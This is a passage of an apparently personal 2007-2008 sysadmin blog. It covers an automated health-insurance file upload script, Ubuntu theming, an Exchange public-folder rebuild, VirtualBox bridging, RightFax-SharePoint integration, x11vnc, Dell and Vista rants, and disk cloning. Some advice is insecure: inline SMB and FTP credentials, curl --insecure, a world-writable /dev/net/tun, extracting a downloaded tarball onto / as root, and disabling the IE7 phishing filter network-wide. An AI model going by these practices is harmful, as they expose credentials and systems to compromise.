if [ -f /data/healthinsurance/README.txt ]
then
 sleep 0
else
 mkdir "/data/healthinsurance/$TIME"
fi

cd "/data/healthinsurance/$TIME"

# Check for SERVER Share
if [ -f /mnt/healthinsurance/README.txt ]
then
 mv /mnt/healthinsurance/Submissions/healthinsurance/working/KCHDEM* /data/healthinsurance/$TIME
else
        #Map to SERVER drive
        mount -t smbfs -o username=ballantynesd,password=password "//SERVER/e$" /mnt/healthinsurance
        # Now move it
 mv /mnt/healthinsurance/Submissions/healthinsurance/working/KCHDEM* /data/healthinsurance/$TIME
fi

# Go put the file on the server
curl --ftp-ssl ftp://ftp.generichealthcare.com -u username:password -T /data/healthinsurance/$TIME/KCHDEM*.txt --insecure
# Done - Exit

Here's the play-by-play of what this script does.

1) A check is made for a README file. If this file doesn't exist, someone may have messed with our directory structure.
2) A date variable is created in the form of MM-DD-YYYY. Then, a directory is created using that variable, and we change directory, or 'cd', into it.
3) We check to see if a README file exists on a shared drive, which has been mounted. If it does not exist - then the drive has come un-mounted so we run through a routine to re-mount the Windows share.
4) Once the mounting issue is resolved, we move the file from the SERVER into that local folder we created with the date variable.
5) With the file in our grips, we use 'curl' to send the file to the health insurance company. Note that we needed two special switches: '--ftp-ssl' and '--insecure'. The '--insecure' was required in my case because the certificate being used for this connection was self-signed.

Now that we understand what we are doing, how will we automate it?

I saved the above script into a file called /root/healthins.sh. Then I did a 'chmod 755 healthins.sh' so that it was executable. Next, I became root by using 'su -' and supplying the root password. Finally, I ran 'crontab -e' which allowed me to edit the root users cron entries.

This is the line I added to the bottom of my scheduled jobs (it was empty).

1 1 * * * /root/healthins.sh >> /root/healthins.log 2>>&1

That line says that on the first minute of the first hour of every day ... run the script called 'healthins.sh' which exists in the /root directory. Then, redirect all of the output from this process into a log file called 'healthins.log' which also exists in root. The '>>' indicates that this file should be appended. That is, *added to* and not overwritten.

I'm happy to say that this has been running well, aside from a mistake I had made in my logging process. But I figured since I was in fixing this - I should document this process for future generations. If this helped you in some way, won't you please drop me a line?

-Steve Ballantyne

Dress up Ubuntu 8.04 Hardy to look like gOS Space

2008-05-09T12:38:00.000-07:00

The nice people over at gOS (read: good Operating System) have released their latest project called "gOS Space". Think Ubuntu, if you layered it up with some eye candy, and then added a nifty dockbar and populated it with MySpace and YouTube Launchers. I have to admit that the visual appearance is pretty good. It's also oddly familiar, because with all of these various pieces mixed together, it resembles the latest OS from Apple.

I downloaded it and tried to boot it in a virtual PC (using VirtualBox). I failed. I also tried burning it to a CD-ROM and I failed at that too. That's because the ISO image is about 68 meg's off from fitting on a standard CD. So I grabbed a DVD and burned a copy. Then I booted it up. The "beauty" of gOS is that you don't have to install it. You can boot to it, and try it out. I tried it. I played with it a while. I was ready to get back to Ubuntu which I had all ready installed, but I wanted to take this nice theme with me.

Here's how you can re-theme your Ubuntu 8.04 Hardy with the pretty space theme.

#1 - Get the wallpaper
If all you wanted was the wallpaper, this is an easy task for you. Because I have mirrored it. you can right click here and download a copy. Then make it your background. You're done!

#2 - Install the wicked green bubbly window theme
One of the niftier looking aspects of this theme are the windows. You won't really see what these look like unless you do some digging. The screen-shots on the gOS site don't show them. I borrowed them the best way I knew how. Find the directories ... tar-ball them up ... and carry them over.

* Right click here and Download this file (save it anywhere).
* Move the file to the root of the file system, and un-tar it. In a Terminal ...

cd Desktop
sudo mv newgosspace.tar.gz /
cd /
sudo tar -xzvf newgosspace.tar.gz

* Apply the theme you just installed: click System > Preferences > Appearance. Then select the "gOS_Theme". Click "apply".
* You're done. Everything is green.

#3 - Install the pretty Dock Bar
gOS makes use of the "Avant Window Navigator". This has been around for quite a while, and can be installed relatively easily to Ubuntu Hardy. But ... the version that they are using for gOS is slightly newer than what you would get from the Hardy repositories. Trust me, you will want the latest stuff if you want the full effect. Namely, what the new version offers over the old one is a big collection of "applets" for your dock-bar, and that neat looking "tilted tile" of your icons (as seen in the screenshot).

If you want to live on the edge, and install the latest stuff ...

* Open up /etc/apt/sources.list and add this line to the bottom:
deb http://ppa.launchpad.net/reacocard-awn/ubuntu hardy main
You will need roots authority to save this file, so you might want to run something like "sudo gedit /etc/apt/sources.list" to open it.
* Now, in a Terminal run "sudo apt-get update".
* Also in a terminal, run this ...
sudo apt-get install awn-core-applets-bzr avant-window-navigator-bzr python-alsaaudio python-awn-bzr python-feedparser
* You will be asked if you want to install all the above, plus some dependencies. Say Yes!

You are almost done. But here is the problem: you have no "preferences manager". Why didn't you install it in the above command? Because it won't work. Basically, you are mixing old and new parts of this application together, and Ubuntu doesn't like it.

* Open this web page, and find the version of awn-manager-bzr_0.3.1.bzr234.1~hardy that matches your version of Ubuntu and PC type. If you are running Hardy and have a standard Intel i386 version, you want to download this one.
* Find the file you just downloaded, and open it (double click it). Then, click the green Install button to install the package. You may be told that this same package exists in your repository. You should ignore that message. It's referring to an earlier release of that same package.
* Click Applications > Accessories > Avant Window Navigator. It should launch at the bottom.

If you were using a "bottom Panel" you now have some real redundancy going on here. You may move that bar to the right side of the screen (click and drag it) or you can right click on it and "delete it". I suggest you keep it around in case you don't like this dock bar (it's been known to be buggy, while it's been very stable for me).

Now you have some configuration to do. If you right click the left most portion of this Avant bar (there's an empty little slice there) you can select "Preferences". From there you can add applets, and the like. I suggest you add the "Stacker" applet (one for each stacker menu you want to create). Then you can right click on each Stacker (as it appears in the dock bar) and click "Preferences". If you would like to use the "visual styling" that I created for my dock, you can download this file. Just save it somewhere handy, and in the dock preferences, click the Themes tab, then Add, and browse to that file. I found the manager to be a bit buggy with themes. If you add the theme, and it doesn't show up in the list - close the manager and re-open it.

If you want the slick Apple look for a Stacker... click the Backend tab and choose "Folder backend". Point it to a folder which contains shortcuts. If you don't have a folder of shortcuts - create one and come back. Click on the Applet Layout tab and check "Composite applet icon". Click the Stack Layout tab and change the Layout to "Curved gui". You may want to fiddle with the other options and tweak them to your liking.

Now you can run full fledged Ubuntu, with all the style of gOS Space! Enjoy.

-Steve Ballantyne

Nightmares with Exchange 2003 Free/Busy Time

2008-04-28T13:51:00.000-07:00

I hadn't been in my current position long before I started noticing strange problems with our Public Folder structure. When I accepted my position as the Network Administrator I became the lucky winner of a battered 2003 Exchange server which was migrated over from version 5.5 back in ... 2005 or so.

I suppose the first sign that something was wrong was that there were strange little entries in the Public Folder list that didn't do anything. When you clicked on them in Outlook a message said "Unable to display the contents of this folder". I used to wonder what was in there and why I couldn't see it. But after asking around I could see that these were "artifacts". That's a nice way of saying, "junk that was left behind and for reasons beyond explanation - they will remain to exist for the life of the server". I tried to delete them. Operation failed. Crap. Now I didn't really care what was in them. That fun curiosity had left me. I just wanted them to go away.

And then came the Free/Busy issue. I had one of our more important and highly scheduled administrative folks ask me why people could schedule her to meetings when she was clearly booked solid. It only took a little bit of clicking around to see that something was wrong here. She was booked all day long but her "free time" only reflected an hour of busy time. I began with trying all the easy fixes, starting with "outlook.exe /cleanfreebusy" from the command line. It ran, without error. It fixed nothing.

Then I stared digging through an endless search of forums, newsgroups, and "knowledge-less bases". It seems I am not alone in my quest for operational Free/Busy functionality. There are many out there that like me are having the same types of issues. I saw a lot of people asking "can't I just delete this Free/Busy time and start it over"? The answer is, no. Because Free/Busy time is a system folder which lives in Public Folders, it isn't easily accessible by anyone. From within the Exchange System Manager you can navigate to it, play with it's simple permissions, and check it's replication. But that's about it. Oddly enough, I didn't really see anything wrong with this folder, despite the fact that it was totally broken.

I also publicly displayed my frustration in a newsgroup, which bared no helpful advice whatsoever.

After reading techno-babble off and on for the better part of two days I came across something of interest. It asked me to check an attribute on the Exchange server using the adsiedit.msc tool. Lo and behold I had located a problem. A particular attribute still held a link to my dead Exchange 5.5 server. Fixing this broken link would theoretically release, recreate, and reattach my Public Folder infrastructure. And so the following weekend I stayed up late drinking diet soda and hacking up my server only to find that the problem STILL EXISTED.

So here is the solution for anyone else that might end up in this mess. First I should mention that I have held back on releasing this entry until today (even though I performed this work nearly a month a ago). The details are a bit fuzzy to me now, but I didn't want to post a solution that wouldn't work. Today, I can honestly say that everyone's Free/Busy time is in good standing - and all those odd-ball Public Folders have been done away with.

Following this procedure will blow away your Public Folders completely, leaving nothing behind. The majority of this process covers how to backup and restore the data that your users will want back. This is a risky procedure, so if you try to do this and break things really badly - don't come looking for me. You have been warned.

Another important note: Performing this procedure will break "favorites". That means if your clients have opened up Outlook and said "add this folder to Favorites", they will now have a broken link. Even if your folder comes back with the same name and the same location - the shortcut will still not work. They (with your help) will need to recreate all of those shortcuts. Expect calls. Clicking on a dead shortcut will cause Outlook to crash!!

Step #1 - Make a backup. If you use Veritas, Symantec, or something of that nature - make a full backup of your Public Folders now. Hope you will never need it. In fact, try not to ever use it. Refer to the notes at the end of this post.

Step #2 - Back up the Public Folder permissions. Get a copy of the Microsoft Exchange Server Public Folder DAV-based Administration Tool. Install this tool (it extracts to a folder) and run it. Then click File > Connect. Enter the properties for your server, and run this as someone with Administrative access. Make sure that the radio button option is selected for "Public Folders". Now you should be able to expand Public Folders, and see them all listed in the left pane. Click on the very top item "Public Folders", and then click Tools > Export Permissions. Leave things at default, and click OK (you may have to set up a log file, so create one if prompted). This will create a text file with all of the Public Folders names, and all the permissions to go with them. In my case, I then opened up this text file ... went down to where it switched from "real" public folders to invisible System Folders. Then I *deleted every line* which referred to System Folders. You should do this too. Problems with Free/Busy could be related to incorrect permissions being applied to your folder set. You do not want to re-import those faulty permissions back onto a healthy Public Folder store.

Step #3 - Back up your Public Folder data. I did this the old fashioned way. By that, I mean that I opened up Outlook, expanded Public Folders, then selected All Public Folders. Then I performed a File > Export, and exported *everything* in Public Folders to a PST file. The danger in doing this is: you cannot back up folders that you have no permission to. So if someone has excluded you access to a folder, it will not get backed up. That could get you in trouble. Compare what you see in Step #2, with what you see inside of Outlook. Make sure you are not missing anything. Also know, this could take *HOURS* depending on the amount of Public Folder data that you have. In my case the store was a little less than 700MB and it took 45 minutes.

Step #4 - Remove Public Folders. To do this, go into Services on the Exchange Server and stop the Information Store. Now, browse to where the Exchange data files are physically stored. Usually this is in x:\Programs Files\Exchsrvr\mdbdata. There are two files; pub1.edb, and pub1.stm. Rename these files - but do NOT delete them. I just added an .old extension to them. Now, go back and restart the Information Store service. This will cause chaos and confusion to your Exchange Server. It should give you a bad news message and ask if you want to create a blank Public Folder set. Say yes. Congratulations, you just destroyed all of your users data. Better act quickly on step #5.

Step #5 - Put the Public Folder data back. This is the reverse of exporting. Go into Outlook, Expand Public folders and notice that it's empty. Now, import your PST back to Public Folders. Note that there is a trick to this! The trick is, you cannot import back into a system folder without Outlook telling you to "stop doing that". What you can do, is expand Public Folders, then expand All Public Folders - and then start the File > Import wizard. At the second or third step where you tell it where you are importing to - select "to currently selected folder". You will also notice that in your PST file this subtree has some bizarre name like "IPM_NON_SUBTREE". Don't worry about that. It will restore to where it needs to. Watch the files copy. When done, make sure things look okay.

Step #6 - Still awake? Now fix the permissions. Open up your tool from Step #2, and click File > Connect. Again, fill in your server properties and make sure Public Folders are selected. Now select Public Folders and then Tools > Import Permissions. This should go pretty quickly. To see if things worked, you should go right clicking randomly on your folders and make sure that the permissions look right. You can also check the log for this tool you have been using.

Step #7 - Update everyones Free/Busy time. The best way to do this is to send out a mass meeting notice for a "fake meeting". You can put it for a Sunday at Midnight, make it last 10 minutes, and put the location down as "fairy land". What's important is that everyone in your organization gets it, and agrees to the meeting. Doing so, will reset their free/busy data on the server. You can also recreate this data by having each user run Outlook from a command line with the /cleanfreebusy switch. Good luck with that! I used the fake meeting method, and it worked wonders.

That should be all there is to it. But there are some ...

Possible Pitfalls!
Free/Busy still not accurate - Let's say that you have imported everything, fixed all the permissions, and the Free/Busy is still whacked. Take a moment to think about this. We have fixed all future appointments, but existing ones may still be a problem. I found that if you delete a reoccurring appointment and recreated it, the free/busy became accurate. Also - waiting longer seems to work. I waited about two weeks and everything seems correct. What fixed it? Who knows. It's Exchange Server.

Folders are missing - If someone had a folder which you could not access, than you probably didn't back it up. Way to go! The good news is that you *renamed the data files*, you did not delete them. The bad news is that you will have a hard time getting the data out of them. If at all possible - do NOT restore from a tape backup. The best thing you can do is use a tool to extract the data from the public folder files. One such tool is called OnTrack PowerControls. It's expensive to buy, but you should be able to use the trial version to extract from a detached Information Store database file. Basically you need to extract the data into a PST, and then import that PST back to the Public Folder tree. If you are stuck doing this ... read the manual for the PowerControls product. ;-)

I sincerely hope that this information comes in useful to someone, some day. It took me a few weeks of off and on experimentation to come up with this. If this helped (or harmed) you won't you please drop me a comment and let me know?

-Steve Ballantyne

VirtualBox with Multiple Bridged Network Interfaces

2008-04-22T08:27:00.000-07:00

Several months ago, I made the switch from VMWare over to VirtualBox. It didn't require a lot of arm twisting. VMWare costs around $500-$600 (for a basic Workstation license) and VirtualBox is absolutely free. While VMWare is a far more robust product, I don't really use most of the advanced features that justify the inflated cost.

Now - many months later I have run into a dilemma with VirtualBox. I want to have two virtual machines running (simultaneously) which can both access the network using IP addresses which they have obtained through DHCP. Setting up a single workstation proved to be quite a challenge, and two required a lot of reading and digging. VMWare definitely makes virtual networking easier - at least on the Windows side of things. I am, of course, running Ubuntu Linux natively and virtualizing all my Windows Operating Systems with VirtualBox.

Here is the script, which made this all possible for me - with comments to follow. In this example, I have TWO physical network cards. eth0, and eth1. eth0 connects my host (the Linux box) to one network for Internet connectivity, etc. in Linux. eth1 is connected to our production network, and will be used solely for my virtual guests.

Note: You will need to install uml-utilities and bridge-utils first. Do that with: sudo apt-get install uml-utilities bridge-utils.

modprobe tun
tunctl -t tap0 -u ballantynesd
brctl addbr br0
ifconfig eth1 0.0.0.0 promisc
brctl addif br0 eth1
ifconfig eth1 up
dhclient br0
brctl addif br0 tap0
ifconfig tap0 up
chmod 0666 /dev/net/tun
# This was added Apr 22 2008
tunctl -t tap1 -u ballantynesd
brctl addif br0 tap1
ifconfig tap1 up
echo 1 > /proc/sys/net/ipv4/conf/tap0/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/tap1/proxy_arp

The above was saved into a file, which should be run as root *before* starting VirtualBox. You can do this with a 'sudo vboxup.sh', or similar. Exchange 'ballantynesd' with the user name that you are running with on your Linux box. Exchange eth1 for your production NIC, whatever that happens to be.

To complete setting up your virtual guests, you will need to shut them down, open up the settings for them, browse to network settings. Change from "NAT" to "Host", and in the lower area set the network card to tap0 or tap1. Leave the rest alone!

With luck, and prayer - you should be able to boot up your virtual machine and obtain an IP with DHCP (or assign one statically if you like).

Good luck! Give me a shout if this should help you out.

-Steve Ballantyne

EDIT: 05/08/2008

It seems that an upgrade to Ubuntu 8.04 LTS, and an upgrade to the new "Sun" branded VirtualBox 1.6.0 ... is not a good idea. I have tried for the past two days to make things work as documented. Namely, the nice little bridge that I had going on. Following the prescribed documentation got me nowhere, so I reverted back to configuring my interfaces "the old fashioned way" and used the above script. My new script is for a single Virtual Box, and it looks a little something like this ...

As stated earlier - this script must be run with 'sudo'.


# Don't need these, so they die
ifconfig vbox0 down
ifconfig eth1 down
# Throw up a bridge
brctl addbr br0
# Add my main card to the bridge
brctl addif br0 eth0
ifconfig eth0 0.0.0.0 promisc
# Bridge goes up
ifconfig br0 up
# Bridge obtains an IP address
dhclient br0
# Give me a virtual adapter
modprobe tun
tunctl -t tap0 -u ballantynesd
# Add the adapter to the bridge
brctl addif br0 tap0
chmod 0666 /dev/net/tun
ifconfig tap0 up

Good luck!!

Connecting RightFax to SharePoint Data

2008-03-24T10:52:00.000-07:00

If you have set up SharePoint “correctly”, then everything should be going into two SQL databases. One to hold the configuration notes for the server, and another to hold the bulk of the user data. It’s likely that you have created a few “Lists” for the sake of holding onto (and sharing) contact data.

Why not then – tie your RightFax Phonebook right into your SharePoint contact data?

To begin, you will need to identify the “List” in which you want to query. From within SharePoint, your List has a “name” which you have given it. In my case, it was called “KCH Directory”. SharePoint has an “ID” which it uses to track this data, and we need to locate this string.

Get onto the SQL server which houses your SharePoint data, and run the SQL Query Analyzer. Point the query analyzer to the correct database. Mine was called “KCH_WSS_CONTENT”. Now, enter this SQL query …

select tp_ID from Lists where tp_Title = 'KCH Directory'

… where ‘KCH Directory’ is the name of your list. Then click the green arrow to process the query. You should see one row returned, with the ID we are after. Right click on that ID and “copy” it. Now paste it to Notepad for later reference.

Next, we need to create an ODBC connection for your RightFax server to use. Open Administrative Tools > Data Sources (ODBC).

Click the System DSN tab, and click “Add …”. Scroll to the bottom of the list and choose SQL Server, then “Finish”. Next you will be given a wizard. Name your source whatever you want. I named mine “passql”. For server, enter the name of the SQL server which houses the SharePoint database, then click next. Change the authentication type if you need to (I didn’t) and click next. Make sure you stop here and “Change the default database to” – and enter the name of the database that has all of your SQL data in it. Then click next, change nothing, and click Finish. Finally, click Okay to leave this window.

Now right-click the RightFax system tray icon, and choose “ODBC Configuration”. Then click “Add”.

Now, name this phone book whatever you like and select our recently created ODBC connection from the ODBC source list.

Fill in your fields “appropriately”. You may need to do some mapping here. That means going back to your SQL Query Analyzer and performing a dump of your UserData table with a query like this …

select * from UserData where tp_ListId = 'YOUR-ID-STRING'

In my case, I was able to match up fields in RightFax to these:

nvarchar1 – last name
nvarchar2 – first name
nvarchar17 – fax number
nvarchar11 - location
nvarchar15 - voice
nvarchar6 – company

So entering them into the RightFax ODBC window, looked like this:

Notice that we only have one field for a name, while SharePoint divides it into a first, last, and middle initial. I have combined first and last, and skipped middle initial (creating one solid RightFax field). All of this information will end up on your Fax Cover Sheet (FCS), which is nice.

The “WHERE” box is a SQL statement “where”. What we are saying here is what we want and don’t want from the UserData SQL dump. In my case I am specifying the particular List that I had in mind, minus the blank company names, and fax-less entries. I also (optionally) told it to only show me entries where the fax number started with a left parentheses “(“. That was because someone had typed textual information into the fax fields on some of my SharePoint data.

My WHERE looked like this (photo obscured) …

(tp_ListId = ‘YOUR-ID-STRING-HERE' and UserData.nvarchar17 is not null and UserData.nvarchar17 like '(%' and UserData.nvarchar6 is not null)

The “ORDER BY” allows you to sort your entries. In my case, I just let it try to sort by last name. But this could have been Company Name, or even numerical Fax Number.

Click OK, and try it out! In my case, I had to do a lot of checking and double checking of my SQL syntax. One little typo and your Phonebook will show up stone empty (there will be no error messages).

To test it – open RightFax FaxUtil, and click the yellow address book symbol. You should have a new tab with the name that you used in the ODBC configuration (mine was passql). When you click the tab, the actual query will take place so there might be a slight delay. You should get a nice list of data, and a few boxes overtop to help you filter out what you were after.

Obviously the ODBC connection, and the RightFax ODBC configuration will need to be repeated for your clients. But there is a way to cheat this as well. You can export elements from the registry, combine them into one .reg file, and import it after running through the installation. You can find the Captaris KB article: here.

I certainly hope this is useful to someone else out there. Drop me a line in the comments and let me know! ;-)

News Flash : Vista Is Terrible

2007-11-29T11:59:00.000-08:00

You are probably sick of reading it and I am sick of saying it but Vista is very, very bad. My latest gripe is all the new error messages that I seem to be generating. This takes me back to the days of old with Windows where you get a message that makes absolutely no sense at all, which also supplies you with the sense that someone will do something about it, and then leaves without giving much more detail (only to reappear in an hour or so).

Here is one ...

A program stopped working. I knew that all ready though, because it went away when it crashed. The error message indicates that Windows will notify me of a solution. But when I "close program", I don't get any notifications. I guess they will track me down and call me. One day I will get a call from an engineer who has a solution to the 3,000+ crashes I had this year.

Here is another ...

It seems that "some program" which wants to remain anonymous is trying to tell me something, but it simply can't. Oh the suspense! Should I be reminded later? What if the program has something really important to tell me? Unfortunately I didn't click the "Why does this happen?" link. I will never know the crackpot reasoning behind the message. It ended up being a browser window which was trying to refresh it's advertisements.

More worthless error messages to come!

The Desktop Revolution

2007-10-28T07:17:00.000-07:00

Apple started it. Many years ago, they released OS X. Everyone marveled at the new effects and tools that it brought, and suddenly Microsoft began to show an interest in giving their desktop products a long overdue makeover. Pretty soon, Windows XP was "all the rave". It was met with a lot of resistance by the business users who were probably correct in saying "Windows 2000 seemed to run faster ... and I don't need these effects to do my job".

Apple continued to build upon it's success in OS, releasing a new version nearly every year for five years. Each time, outdoing itself with innovative new features that provided new tricks for the user, but also looked *really* good doing it. Microsoft answered with "please wait". Once they felt that they had caught up, they release Windows Vista. Even with the BETA releases it was obvious that Microsoft would never keep up with the "design wars" that laid ahead. Windows Vista simply duplicated a few effects that they liked from OS X but also tried to sneak in a software-crippling security overhaul. This has of course left most users demanding "I want Windows XP back".

Meanwhile, open source groups have aimed to out-do the commercial software companies when it comes to good looks. And why not? Linux after has been built and is maintained by the people, for the people since it's inception. It's the democracy of software. If something bombs and doesn't work, it either gets fixed or becomes "deprecated". Developers can work together on projects and build code at all hours of the day and night using systems that they developed earlier on. So it shouldn't be any surprise that the race to come up with the best looking desktop will be plaid out on open source platforms.

If you work in or around IT, or you have a nerd for a friend, you have no doubt heard of Beryl. Beryl was an experiment in using a commercial graphics card to create mind-bending effects for simple window and desktop management. It got a lot of attention. As did the Compiz project which aimed to do similar effects. Eventually they merged the two projects allowing the user to get the best effects from each collection, and possibly a little more stability. The result is "Compiz Fusion".

I must admit I was fascinated watching YouTube videos like this one. Windows Vista has a "tile effect" that let's you stack windows at an angle. Compiz allows you multiple desktops on a rotating cube, window-tabbing, OS X "expose" style arrangements, and more. Do I need all that to enjoy my computer? No. In fact, with these state of the art effects come a slew of bugs and crashes. After all, the code you are using to demonstrate effects like these were written by dozens of different people and were assembled moments later to begin experimenting with them. Still, someone like me sees a demonstration of the effects and I am all ready working on getting them running on my PC.

I am not the only one amused. Search YouTube for "compiz" and you will find that these videos are getting hundreds of thousands of viewings. Take a look around the forums for popular Linux distributions like Ubuntu and you will find that they are plagued with questions from folks who are fighting through crashes and panics to get these effects on their screens.

The war wages on, and yet the real casualties here are going to be "the business desktop user". Remember that attention like this does not go un-noticed. Shareholders will demand that commercial products implement the "fire painting" that their nephew was showing off. Microsoft will quickly attempt to duplicate the feature and put it into their home version of Windows Vista. The business users who purchased Vista Ultimate edition (and have little show for it at this point) will demand that it also be available to them. Before long, I will be rolling through group policies, user complaints, and help desk calls trying to stop the madness. Of course when I am done at work, I will go home, fire up Linux, and begin experimenting with effects that are years ahead of anything that Microsoft has done.

If you still haven't watched it yet, you owe it to yourself to see what all the fuss is about: http://www.youtube.com/watch?v=E4Fbk52Mk1w. Note that the video ends with "I have to admit: I made this with iMovie". Credit to Apple, where credit was due.

Starting x11vnc Easily

2007-10-23T18:58:00.000-07:00

I had a friend recently ask me how I share out my desktop in Linux so that I can log in and run things remotely. I told him that I use a tool called "x11vnc" which allows you to share out an X-Windows session that has all ready been started. This is different than the normal VNC server functionality for Linux, which is to start an all new X-Windows session for remote access.

Using your default display allows you to get back to whatever you left running at the house. Perhaps a web page you were on at the time, a few bit-torrents that you want to check up on, etc.

In trying to share my method I had to confess that I really don't know how I made it all work. I was up late one night when I finally string together a command which got the desktop shared. Since then, I had been copying and pasting commands from a text file that I had saved away. The text file has now perished in a re-installation so I finally took the time to figure this all out again. This time, I have written a sensible shell script which I will document here for my friend Rob, and for anyone else who might be interested.

#!/bin/bash

# Set this to your username
USERNAME="steve"
XAUTH=`/usr/bin/ls /var/run/xauth`

# Are we root, or just some schmuck?
if [ $(whoami) = "root" ]
then
# Now, do we have a password file created?
if [ -e /home/$USERNAME/.vnc/passwd ]
then
x11vnc -shared -display :0 -auth /var/run/xauth/$XAUTH -usepw -forever
else
echo -e "You have not set a password yet, run: x11vnc -storepasswd as $USERNAME."
exit 1
fi
else
echo "You need to be root to do this (or use sudo -b ./startx11vnc)."
exit 1
fi

exit 1

This script requires root permissions, and does the usual griping if it's run as a regular user. It then goes out to see if the person running it has all ready created a VNC connection password. If not, it gripes some more but drops a hint on how to create one. If running this as root, and you have a password file created, we then go out and find your xauth file. This file is needed to point x11vnc to the active running session. With that, we finally launch x11vnc and begin sharing the desktop.

Notice that to run x11vnc, the script suggests using "-b" which will allow the sudo command to ask for the password, and then politely launch the program into the background. In doing so, you can safely close the terminal window that you launched this command from.

Although wouldn't it be nice if this ran every time you logged on? Oh, I will have to work on that now.

Dell's DeVo

2007-10-21T06:52:00.000-07:00

I thought with all the advancement of modern-day "personal computers" that I might celebrate some de-evolution. Namely, by one of the biggest players in the market: Dell. More so, this is a short list of things that I have grown to hate Dell for and I need a place to gripe about it.

Upside-down, and angled USB ports - For several years Dell built a line of PC's with USB ports that were impossible to plug anything into. That's because the ports were flip-flopped from what they should have been, then angled at 45 degrees, and then covered with a plastic "hood" that had to be pulled up. Other than the fact that it reminds me of the deck lid on a Volkswagen Beetle - there is no benefit to this awful design flaw. If your PC was sitting on the floor (which it probably was, because the case was so damned big) you practically had to do a hand stand to plug in a jump-drive.
Dysfunctional Mouse Pads - How can you possibly screw up with a rubber matted piece of canvas? By plastering your logo onto it in high contrast colors then slapping some odd-ball reflective coating onto it which gives it a "shiny" appearance. The effect was that every time your optical mouse struck the lower right corner of the Dell logo, it repositioned itself on the screen. Today, I still occasionally find one of these mouse pads on a users desk and send it directly to the garbage. It seems that there are a lot of users with far more patience for something like this than me.
Ghost Mouse Syndrome - My poor father was the first to discover this flaw in Dell laptops. It seems that the mouse had a funny way of creeping around on it's own. Most attribute the problem to an oversensitive glide pad, which many other conspire that your mouse was being controlled by the souls of dead slave laborers from China. Aside from the creepy effect, the mouse would sometimes click itself too, causing a drag-over and delete effect on whatever you happened to be typing. I called Dell about it (not expecting much action). Dell said "plug in an external mouse". I asked "what if you're on an airplane or something?". Dell responded "you can also disable it in the BIOS". Ah yes. Problem solved. Dad can survive on Alt+Tab, Alt+F4, and other quick-key combo's.
Peek-A-Boo 15 Inchers - Oddly, just after the warranty had expired ... I saw a large number of 15 inch LCD displays being sent to the garbage. They seemed to come down with a case of "peek-a-boo". That's where your screen suddenly goes black. Just about the time you are picking up the phone to call the IT department, it comes back. Eventually, it goes black every thirty seconds or so making work impossible. Dell was aware of some sort of flaw in the devices but since these are "old news" they have made no attempt to assist anyone with one of these dying pieces of garbage. But if you call them, they can assist you in finding someone in your area who will recycle the components at little or no cost.
Case Bloat - Bigger is better! And titanic cases are back in style. Introducing the largest PC on the market - the GX-745 series. When you drop a few thousand dollars into a new PC these days, you expect to get your moneys worth. Dell sells that illusion by sending you an over-sized boat anchor. They seem to have forgotten how often office workers are relocated, and how many of us literally try to put these things on our backs to get them around. Sure it's nifty that the lid pops out of the side, and I have all sorts of little green tab things instead of screws. But all that extra plastic and aluminum make up for another 20 pounds and I fail to see how the bulk gives it any better of an appearance. Here's a neat trick - you can stack them. The tops are beveled to fit the bottom of another. We have had fun stock piling these our store room at work. Because nobody wants one, and those who do want one can't fit it into their desk.
Windows Vista> - In Dell's defense, they will still sell you a PC with Windows XP on it. But expect your laptop or desktop to still feature a prominent "Windows Vista" sticker on it. If I need to tell you why Windows Vista is a bad thing, you obviously haven't been subjected to it like I have. I will save that for another gripe session.

I'm sure you could think of a few reasons you hate Dell. Feel free to chime in with the comments feature.

Die Phishing Filter!

2007-10-15T05:46:00.000-07:00

Every time I set up a new XP workstation, I give it all the appropriate updates which includes Internet Explorer 7. I have to imagine that users who are not familiar with IE7 (damn near everybody) gets a little confused and perhaps even concerned when they start seeing "check this site for phishing" dialog boxes. This feature, while it's intentions may be good, does nothing but causes me additional phone calls.

This morning I looked into how I might get rid of this feature once and for all - everywhere on my network. It turned out to be quite involved, and I didn't find many good resources on this topic. So here are some helpful tips for anyone else out there that would like to disable the phishing filter using group policy.

1) Install the additional IE 7 Group Policy Templates. You may all ready have this template if you are running Vista. If you are running Windows XP, you can download them here.

2) If you had to download and install the template (XP users) you will need to perform this step. Otherwise, go to the next one. Open up your Group Policy Editor and expand Computer Configuration. Now right click Administrative Templates, and then choose "Add/Remove". You can then click "Add" and browse out to the Template that you installed in step 1. It should be called "inetres" (it will have an invisible .inf extension).

3) Now, expand Administrative Templates, Windows Components, and select Internet Explorer. Check the details on the right. You should see "Turn off managing phishing filter". Read the text in the explanation box to ensure that you understand what is happening here. If you really want to be done with this forever, you should set this to "Disabled".

Now allow me to step on my soapbox for a moment here. If you are going to deploy a change like this through Group Policy, you should create a new policy to do it. Don't use the Default Domain Policy. When you create that new policy, name it something sensible such as "IE7 Disable Phishing Filter" or just "IE7 Settings". You never know when some other poor uneducated administrator may have to take over your job and figure out what the heck you did to their network.

You can find more good information on this topic from this Microsoft Technet article.

Going from IDE to SATA in Linux

2007-10-07T10:00:00.001-07:00

A few years ago now I was shopping for a new motherboard and processor combo to perform an in-case upgrade to my outdated PC. One of my decisions was between two different motherboards. The only noticeable difference was that one supported SATA drives and the other was strictly IDE. It was an extra seven bucks for the SATA board ... so I went ahead and bought that one.

Since then I have only ever used IDE drives as that was all I had available, and I wasn't trying to spend any more on the upgrade than I had to. But I recently was gifted an 80 gig SATA drive. Now all I had to do was to get all of my data onto it. Luckily the IDE drive that the SATA drive is replacing is the same size: 80 gigs.

I put together a plan to completely "clone" my present system and copy all of my data onto the new SATA drive. This would keep me from having to migrate my data away, reinstall Frugalware Linux, and then put all of the data back. My plan worked surprisingly well, so here is what I did. I hope that this will help someone out there who stumbles upon this in a Google search.

1) First, I simply installed the drive (physically) and checked to ensure that the BIOS was detecting it correctly. That part was relatively simple. Then, I booted as I normally would.

2) Once I was booted into Linux, I opened up a terminal and ran the following command ...

dd if=/dev/hda of=/dev/sda bs=32768

That command in a nutshell, copied every single track from the IDE drive (hda) to my SATA drive (sda). It created a complete clone. This would have also worked had my new drive been larger (but not smaller, as that would produce an out of space error). The problem would have been then that the new partition did not fill the drive. You would have to use a partition editor to fix this problem, such as gparted. I should note that copying 80 gigs takes a pretty long time. About as long as it would have taken to low level format the IDE 80 gig drive. In my case, it was about 1 hour and 10 minutes.

3) Now that I have cloned my drive, I needed to make sure that Linux knows to boot from it. For that I first mounted the new partition. In my case, sda1 was the "data" partition on my SATA drive, and sda2 was the "swap" partition.

mkdir /mnt/newdrive
mount /dev/sda1 /mnt/newdrive
vi /mnt/newdrive/etc/fstab

